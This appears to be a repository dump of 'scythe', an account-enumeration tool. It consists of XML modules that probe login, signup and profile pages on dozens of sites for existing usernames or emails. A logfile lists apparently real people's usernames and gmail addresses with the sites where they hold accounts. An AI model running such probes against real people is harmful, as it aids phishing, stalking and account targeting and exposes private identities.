modification, are permitted provided that the following conditions are 7 | met: 8 | 9 | (1) Redistributions of source code must retain the above copyright 10 | notice, this list of conditions and the following disclaimer. 11 | 12 | (2) Redistributions in binary form must reproduce the above copyright 13 | notice, this list of conditions and the following disclaimer in 14 | the documentation and/or other materials provided with the 15 | distribution. 16 | 17 | (3)The name of the author may not be used to 18 | endorse or promote products derived from this software without 19 | specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 22 | IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 23 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, 25 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 26 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 28 | HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, 29 | STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING 30 | IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 31 | POSSIBILITY OF SUCH DAMAGE. 32 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/logfile.txt: -------------------------------------------------------------------------------- 1 | Account odyssomay exists on cafemom.com (Username) 2 | Account odyssomay exists on GMail (username) 3 | Account odyssomay@gmail.com exists on cafemom.com (Username) 4 | Account reikaff@gmail.com exists on cafemom.com (Username) 5 | Account midorisalt@gmail.com exists on cafemom.com (Username) 6 | Account elinff@gmail.com exists on cafemom.com (Username) 7 | Account jonathanff@gmail.com exists on cafemom.com (Username) 8 | Account reikaff exists on cafemom.com (Username) 9 | Account reikaff exists on GMail (username) 10 | Account midorisalt exists on cafemom.com (Username) 11 | Account midorisalt exists on GMail (username) 12 | Account jonathanfischerfriberg exists on cafemom.com (Username) 13 | Account ElinFischerFriberg exists on cafemom.com (Username) 14 | Account elinff exists on cafemom.com (Username) 15 | Account elinff exists on colourlovers.com (Username) 16 | Account elinff exists on GMail (username) 17 | Account jonathanff exists on cafemom.com (Username) 18 | Account jonathanff exists on colourlovers.com (Username) 19 | Account jonathanff exists on twitpic.com (Username) 20 | Account jonathanff exists on Reddit.com (username) 21 | Account jonathanff exists on slideshare.net (Username) 22 | Account jonathanff exists on GMail (username) 23 | Account jonathanff exists on Yahoo (yahoo.co.uk email) 24 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/blogspot_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | blogspot.com (Username) 6 | .blogspot.com]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Powered by 13 | Blog not found 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/delicious_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | delicious.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Joined 13 | The page you requested could not be found. 14 | 10/13/2012 15 | 1 16 | WiK 17 | blogs 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/goodreads_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | goodreads.com (Username) 6 | /]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Recent Updates 13 | Page Not Found 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | blogs 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/livejournal_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | livejournal.com (Username) 6 | .livejournal.com]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | most recent journal entries recorded 13 | Unknown Journal 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | blogs 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/mahalo_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | mahalo.com (Username) 6 | /]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Profile 13 | Sorry, we couldn't find the page you were looking for. 14 | 10/13/2012 15 | 1 16 | WiK 17 | blogs 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/newsvine_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | newsvine.com (Username) 6 | .newsvine.com]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Member Since: 13 | Oh my. There doesn't seem to be a page here anymore. 14 | 10/13/2012 15 | 1 16 | WiK 17 | blogs 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/posterous_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | posterous.com (Username) 6 | .posterous.com]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | ARCHIVE 13 | Oh no! We couldn't find your page. 14 | 10/13/2012 15 | 1 16 | WiK 17 | blogs 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/resumebucket_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | resumebucket.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Forward This Resume 13 | The page you requested could not be found. 14 | 10/13/2012 15 | 1 16 | WiK 17 | blogs 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/squidoo_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | squidoo.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | We're looking forward to something great happening soon 13 | Joined: 14 | I'm sorry, but we couldn't find that! 15 | 10/12/2012 16 | 1 17 | Jaime Filson aka WiK 18 | blogs 19 | 20 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/tumblr.com_email.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | tumblr.com 5 | 6 | POST 7 | &user%5Bpassword%5D=&tumblelog%5Bname%5D=&action=signup_account]]> 8 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 9 | False 10 | False 11 | email address is already in use 12 | 13 | 14/09/2012 14 | 1 15 | CJR 16 | blogs 17 | 18 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/tumblr.com_username.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | tumblr.com 5 | 6 | POST 7 | %40example.com&user%5Bpassword%5D=&tumblelog%5Bname%5D=&action=signup_account]]> 8 | Content-Type: application/x-www-form-urlencoded; charset=UTF-8 9 | False 10 | False 11 | Another person has claimed this 12 | 13 | 14/09/2012 14 | 1 15 | CJR 16 | blogs 17 | 18 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/blogs/wordpress.com.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Wordpress.com 5 | 6 | POST 7 | &pwd=&testcookie=1&redirect_to=http%3A%2F%2Fwordpress.com%2F&submit=]]> 8 | 9 | False 10 | False 11 | The password you entered for the email or username 12 | Invalid email or username 13 | You have exceeded the login limit 14 | 13/09/2012 15 | 2 16 | CJR 17 | blogs 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/commerce/ebay.com_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ebay.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Feedback score: 13 | The User ID you entered was not found. 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | commerce 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/commerce/etsy_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | etsy.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Joined 13 | Sorry, the user you are looking for does not exist. 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | commerce 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/commerce/kaboodle_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | kaboodle.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Followers 13 | Sorry, the user does not exist. 14 | 10/13/2012 15 | 1 16 | WiK 17 | commerce 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/development/github.com_email.xml: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | Github.com (Email) 9 | 10 | POST 11 | ]]> 12 | , Accept-Language: en-us, Content-Type: application/x-www-form-urlencoded; charset=UTF-8]]> 13 | true 14 | 15 | 16 | 17 | 18 | Email is invalid or already taken 19 | 20 | Due to the way github works, invlaid email addresses may appear as false positives 21 | 16/09/2012 22 | 2 23 | CJR 24 | development 25 | 26 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/development/github.com_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Github.com (username) 5 | 6 | POST 7 | ]]> 8 | , Accept-Language: en-us, Content-Type: application/x-www-form-urlencoded; charset=UTF-8]]> 9 | true 10 | 11 | 12 | 13 | 14 | Username is already taken 15 | 16 | 15/09/2012 17 | 1 18 | CJR 19 | development 20 | 21 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/examples.xml: -------------------------------------------------------------------------------- 1 | 10 | 11 | 12 | 13 | Example Module GET 14 | ]]> 15 | GET 16 | 17 | Referer: http://www.example.com,Example: abcd 18 | 19 | 20 | 21 | ]]> 22 | 23 | password incorrect 24 | Invalid email or username 25 | 08/09/2012 26 | 1 27 | CJR 28 | example 29 | 30 | 31 | Example Module POST 32 | 33 | POST 34 | &pwd=&submit=]]> 35 | Referer: http://www.example.com,Example: abcd 36 | True 37 | 38 | password incorrect 39 | Invalid email or username 40 | 08/09/2012 41 | 1 42 | CJR 43 | example 44 | 45 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/backtrack_forum_username.xml: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | BackTrack Forum 10 | 11 | POST 12 | &securitytoken=guest&do=verifyusername&username=]]> 13 | Accept-Language: en-gb 14 | false 15 | false 16 | That username is already 17 | Username is valid 18 | Account names cannot be in the format of an email address. Email addresses will cause flase positives 19 | 08/09/2012 20 | 1 21 | Digininja 22 | forums 23 | 24 | 25 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/buzznet_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | buzznet.com (Username) 6 | .buzznet.com/user/]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Notes to 13 | the page you requested was not found. 14 | 10/13/2012 15 | 1 16 | Jaime Filson aka WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/cafemom_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | cafemom.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Joined 13 | Personal Statement 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/colourlovers_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | colourlovers.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Last Seen 13 | [Invalid Lover] 14 | 10/13/2012 15 | 1 16 | WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/deviantart_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | deviantart.com (Username) 6 | .deviantart.com]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Newest Deviations 13 | The page you were looking for doesn't exist. 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/epinions_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | epinions.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Epinions.com ID: 13 | Sorry, the page you requested was not found. 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/families_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | families.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Recent Photos 13 | Page not found 14 | 10/13/2012 15 | 1 16 | WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/fanpop_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | fanpop.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Fanpopping since 13 | Search for anything you're a fanatic of 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/instructables_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | instructables.com (Username) 6 | /]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Joined: 13 | ERROR 400: no member: 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/forums/wikipedia_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | wikipedia.org (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | This page was last modified 13 | is not registered 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | forums 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/games/kongregate_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | kongregate.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | MEMBER SINCE 13 | Sorry, no account with that name was found. 14 | 10/13/2012 15 | 1 16 | Jaime Filson aka WiK 17 | games 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/games/xfire_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | xfire.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Game Library 13 | Try using the header to get back on track 14 | 05/19/2013 15 | 1 16 | anonymous 17 | games 18 | 19 | 20 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/dailymotion_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | dailymotion.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | create a jukebox 13 | HOUSTON, WE'VE GOT A PROBLEM... 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/flickr_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | flickr.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Subscribe to 13 | Oops! Looks like you followed a bad link. 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/funnyordie_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | funnyordie.com (Username) 6 | /]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | MEMBER 13 | We're sorry but we can't find that webpage. 14 | 10/13/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/hulu_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | hulu.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Joined On: 13 | The page you were lookin for doesn't exist (404 error) 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/justintv_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | justin.tv (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | 's channel 13 | Sorry, we couldn't find that stream. 14 | 10/13/2012 15 | 1 16 | WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/lastfm_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | last.fm (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Last seen: 13 | User not found 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/photobucket_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | photobucket.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Feed for this album 13 | Page not found 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/soundcloud_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | soundcloud.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Sounds from 13 | Oops, looks like we can't find that page! 14 | 10/13/2012 15 | 1 16 | WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/twitpic_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | twitpic.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Photos and Videos by 13 | User could not be found 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/ustream_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | ustream.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Joined: 13 | An error occured 14 | 10/13/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/vimeo_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | vimeo.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Joined 13 | Page Not Found 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/yfrog_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | yfrog.com (Username) 6 | /profile]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Timeline Search 13 | Something went wrong ... bad bad frog 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/youtube_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | youtube.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Featured 13 | the page you requested cannot be found 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/media/zooomr_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | zooomr.com (Username) 6 | /]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Subscribe to 13 | This Page was Not Found 14 | 10/13/2012 15 | 1 16 | WiK 17 | media 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/badoo_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | badoo.com (Username) 6 | /]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Personal info 13 | We can't seem to find this page 14 | 10/13/2012 15 | 1 16 | WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/bitly_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | bitly.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | BITMARKS 13 | Uh oh, bitly couldn't find a link for the bitly URL you clicked. 14 | 10/13/2012 15 | 1 16 | WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/cardcloud_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | cardcloud.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Download vCard 13 | We couldn't find the page you're looking for 14 | 10/13/2012 15 | 1 16 | WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/disqus_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | disqus.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Activity 13 | Sorry, we couldn't find that page 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/facebook_email_phone.com.xml: -------------------------------------------------------------------------------- 1 | 6 | 7 | 8 | facebook.com (Email/Phone) 9 | 10 | POST 11 | &pass=&default_persistent=1&login=Log+In]]> 12 | Accept-Language: en-gb 13 | true 14 | false 15 | The password you entered is incorrect 16 | not (belong to|associated with) 17 | Security Check 18 | Account names must be in email address or telephone number format. Permalinks will cause flase positives 19 | 08/10/2012 20 | 4 21 | CJR 22 | social 23 | 24 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/flixster_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | flixster.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Add as Friend 13 | This profile is inaccessible, or the user has cancelled their account. 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/foursquare_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | foursquare.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Check-ins 13 | We couldn't find the page you're looking for. 14 | 10/13/2012 15 | 1 16 | WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/gather_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | gather.com (Username) 6 | .gather.com]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | You are not connected to 13 | The group or member URL you're trying to view does not exist. 14 | 10/13/2012 15 | 1 16 | WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/linkedin_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | linkedin.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Overview 13 | Profile Not Found 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/myspace_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | myspace.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | All Rights Reserved 13 | Your home page is undergoing routine maintenance 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/reddit.com_username.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Reddit.com (username) 6 | ]]> 7 | GET 8 | Accept-Language: en-gb 9 | false 10 | true 11 | 08/10/2012 12 | 1 13 | CJR 14 | social 15 | 16 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/slideshare_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | slideshare.net (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Followers 13 | is still available. Why not 14 | 10/13/2012 15 | 1 16 | WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/stumbleupon_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | stumbleupon.com (Username) 6 | /]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Interests 13 | we can't find the page 14 | 10/12/2012 15 | 1 16 | Jaime Filson aka WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/twitter.com_email_phone.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Twitter.com (Email/Phone) 5 | &value=]]> 6 | GET 7 | 8 | Accept-Language: en-gb 9 | False 10 | False 11 | Looks good! 12 | Email or phone is invalid 13 | 13/09/2012 14 | 2 15 | CJR 16 | social 17 | 18 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/twitter.com_username.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Twitter.com (username) 5 | &value=]]> 6 | GET 7 | 8 | Accept-Language: en-gb 9 | False 10 | False 11 | Looks good! 12 | Username is invalid 13 | 13/09/2012 14 | 2 15 | CJR 16 | social 17 | 18 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/wefollow_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | wefollow.com (Username) 6 | ]]> 7 | GET 8 | 9 | Accept-Language: en-gb 10 | False 11 | False 12 | Followers 13 | the page you are looking for does not exist 14 | 10/13/2012 15 | 1 16 | WiK 17 | social 18 | 19 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/social/xing.com.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | xing.com 5 | 6 | POST 7 | ]]> 8 | Accept-Language: en-gb,X-Requested-With: XMLHttpRequest 9 | False 10 | False 11 | already registered 12 | 13 | 13/09/2012 14 | 2 15 | CJR 16 | social 17 | 18 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/webmail/gmail_user.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | GMail (username) 6 | 7 | POST 8 | ","FirstName":"","LastName":""},"Locale":"en"}]]> 9 | Content-Type: application/json; charset=UTF-8,Accept-Language: en-us 10 | Someone already has that username 11 | "Valid":"true" 12 | 08/10/2012 13 | 1 14 | CJR 15 | email 16 | 17 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/webmail/hushmail.xml: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | Hushmail (hushmail.com email) 8 | 9 | POST 10 | &hush_domain=hushmail.com]]> 11 | Accept-Language: en-us 12 | ]]> 13 | 09/10/2012 14 | 1 15 | CJR 16 | email 17 | 18 | 19 | Hushmail (hushmail.me email) 20 | 21 | POST 22 | &hush_domain=hushmail.me]]> 23 | Accept-Language: en-us 24 | ]]> 25 | 09/10/2012 26 | 1 27 | CJR 28 | email 29 | 30 | 31 | Hushmail (hush.com email) 32 | 33 | POST 34 | &hush_domain=hush.com]]> 35 | Accept-Language: en-us 36 | ]]> 37 | 09/10/2012 38 | 1 39 | CJR 40 | email 41 | 42 | 43 | Hushmail (hush.ai email) 44 | 45 | POST 46 | &hush_domain=hush.ai]]> 47 | Accept-Language: en-us 48 | ]]> 49 | 09/10/2012 50 | 1 51 | CJR 52 | email 53 | 54 | 55 | Hushmail (mac.hush.com email) 56 | 57 | POST 58 | &hush_domain=mac.hush.com]]> 59 | Accept-Language: en-us 60 | ]]> 61 | 09/10/2012 62 | 1 63 | CJR 64 | email 65 | 66 | -------------------------------------------------------------------------------- /social_engineering/tools/scythe/modules/webmail/yahoo_email.xml: -------------------------------------------------------------------------------- 1 | 5 | 6 | 7 | Yahoo (yahoo.com email) 8 | @yahoo.com&ApiName=ValidateFields&intl=us]]> 9 | GET 10 | Accept-Language: en-gb 11 | "ErrorCode":"100000" 12 | "ResultCode":"SUCCESS" 13 | Empty response from server 14 | Blocking reported using this module, wait time suggested 15 | 